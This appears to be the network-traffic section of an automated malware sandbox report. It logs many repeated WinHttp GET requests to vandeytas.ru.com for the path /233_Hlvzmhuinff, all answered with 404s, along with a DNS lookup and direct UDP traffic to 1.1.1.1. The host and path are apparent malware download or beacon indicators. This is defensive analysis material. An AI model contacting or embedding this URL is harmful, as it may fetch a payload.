      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficDNS traffic detected: DNS query: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:20 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:23 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:57 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:20 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:37 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
